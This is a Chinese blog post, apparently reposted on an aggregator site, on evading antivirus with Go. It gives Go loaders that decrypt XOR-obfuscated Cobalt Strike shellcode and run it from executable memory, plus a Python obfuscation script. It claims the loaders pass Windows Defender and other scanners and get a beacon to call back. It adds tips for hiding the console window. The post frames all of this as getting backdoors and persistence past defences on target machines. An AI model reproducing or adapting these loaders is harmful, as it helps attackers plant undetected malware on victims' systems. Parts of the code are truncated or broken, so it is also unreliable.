go免殺初探

時間  2021-02-13
標籤 html python shell 編程 windows 安全 app dom 測試 優化 欄目 HTML 简体版
原文   原文鏈接

0x01 go免殺

因爲各類av的限制,咱們在後門上線或者權限持久化時很容易被殺軟查殺,容易引發目標的警覺同時暴露了本身的ip。尤爲是對於windows目標,一個免殺的後門極爲關鍵,若是後門文件落不了地,還怎麼能進一步執行呢?關於後門免殺,網上的介紹已經不少了,原理其實大同小異。看了不少網上的案例,發現網上比較多都是用C/C++和python來進行免殺,可是不少已經被殺軟看的死死的,
很是容易就被識別出來了,那我想能不能用一種稍微小衆一點的語言來寫免殺呢,這裏就不得不說到go語言。
Go語言專門針對多處理器系統應用程序的編程進行了優化,使用Go編譯的程序能夠媲美C或C++代碼的速度,並且更加安全、支持並行進程。並且go語言支持交叉編譯能夠跨平臺。
本文基於cobalt strike生成的.c文件來進行免殺測試。html

0x02 免殺測試

首先生成成一個.C文件


這裏先貼一個最原始的go加載代碼python

package main

import (
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40 // 區域能夠執行代碼,應用程序能夠讀寫該區域。
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func main() {
	xor_shellcode := []byte{0x89, 0x3d, 0xf6, 0x91, 0x85, 0x9d, 0xb9, 0x75, 0x75, 0x75, 0x34, 0x24, 0x34, 0x25, 0x27, 0x24, 0x23, 0x3d, 0x44, 0xa7, 0x10, 0x3d, 0xfe, 0x27, 0x15, 0x3d, 0xfe...}

	addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_shellcode[0])), uintptr(len(xor_shellcode)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	syscall.Syscall(addr, 0, 0, 0, 0)
}

這裏注意:由於殺軟對直接加載shellcode的通常都是落地秒,因此咱們得換種方式,將shellcode混淆加密後再解密來使用。
加密和混淆常常使用的有異或加密,AES加密,或者添加隨機字符等。
可是隨着如今使用這種方法的人愈來愈多,殺軟檢測力度也愈來愈大,因此如今混淆的關鍵就是方式儘可能要小衆,或者本身寫加密方法。
這裏有個好的地方就是,如今網上實現加密混淆操做的大都是使用C/C++來完成的,有些比較好的思路用C/C++實現可能會被殺軟攔截,可是若是把它移植到go上面說不定就有不同的效果。
先從整個shellcode混淆的腳本shell

def xor(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 對shellcode的每一位進行xor亦或處理
    for i in range(0, len(shellcode)):
        s = ord(shellcode[i])
        p = ord((key[i % key_len]))
        s = s ^ p  # 與p異或,p就是key中的字符之一
        s = chr(s) 
        new_shellcode += s
    return new_shellcode

def random_decode(shellcode):
    j = 0
    new_shellcode = ""
    for i in range(0,len(shellcode)):
        if i % 2 == 0:
            new_shellcode[i] = shellcode[j]
            j += 1

    return new_shellcode

def add_random_code(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 每一個字節後面添加隨機一個字節,隨機字符來源於key
    for i in range(0, len(shellcode)):
        #print(ord(shellcode[i]))
        new_shellcode += shellcode[i]
        # print("&"+hex(ord(new_shellcode[i])))
        new_shellcode += key[i % key_len]

        #print(i % key_len)
    return new_shellcode

# 將shellcode打印輸出
def str_to_hex(shellcode):
    raw = ""
    for i in range(0, len(shellcode)):
        s = hex(ord(shellcode[i])).replace("0x",',0x')
        raw = raw + s
    return raw

if __name__ == '__main__':
    shellcode = ""
    # 這是異或和增長隨機字符使用的key
    key = "iqe"
    print(shellcode[0])
    print(len(shellcode))
    # 首先對shellcode進行異或處理
    shellcode = xor(shellcode, key)
    print(len(shellcode))

    # 而後在shellcode中增長隨機字符
    shellcode = add_random_code(shellcode, key)

    # 將shellcode打印出來
    print(str_to_hex(shellcode))

加密shellcode後,再使用go語言加載混淆後的shellcode,先解密再執行。編程

package main

import (
	"fmt"
	"syscall"
	"time"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40 // 區域能夠執行代碼,應用程序能夠讀寫該區域。

)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func main() {
	mix_shellcode := []byte{0x95,0x69,0x39,0x71,0xe6,0x65}
	var ttyolller []byte
	key := []byte("iqe")
	var key_size = len(key)
	var shellcode_final []byte
	var j = 0
	time.Sleep(2)
	// 去除垃圾代碼
	fmt.Print(len(mix_shellcode))
	for i := 0; i < len(mix_shellcode); i++ {
		if (i % 2 == 0) {
			shellcode_final = append(shellcode_final,mix_shellcode[i])
			j += 1
		}
	}
	time.Sleep(3)
	fmt.Print(shellcode_final)
	// 解密異或
	for i := 0; i < len(shellcode_final); i++ {
		ttyolller = append(ttyolller, shellcode_final[i]^key[i % key_size])
	}
	time.Sleep(3)
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	time.Sleep(3)
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	syscall.Syscall(addr, 0, 0, 0, 0)
}

直接go build生成exe文件
生成的文件大概有2M,再通過UPX壓縮後大概只有1M,這比python生成的要小不少了。

靜態完美過WindowsDefender,火絨和360全家桶


能夠正常上線

VT查殺率71/8

能夠看到國內的就一款殺軟查出來了windows

後記

用go編譯的exe文件執行後會彈出黑框這裏有兩個解決辦法安全

  • 在initial_beacon中設置auto migrate,但還得連帶把initial sleep設置成儘量短
  • build時添加操做選項:-ldflags="-H windowsgui"

參考

https://payloads.online/archivers/2019-11-10/1
https://saucer-man.com/operation_and_maintenance/465.html#cl-5
http://iv4n.cc/go-shellcode-loader/#shellcode-loader
https://payloads.online/archivers/2019-11-10/3app

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程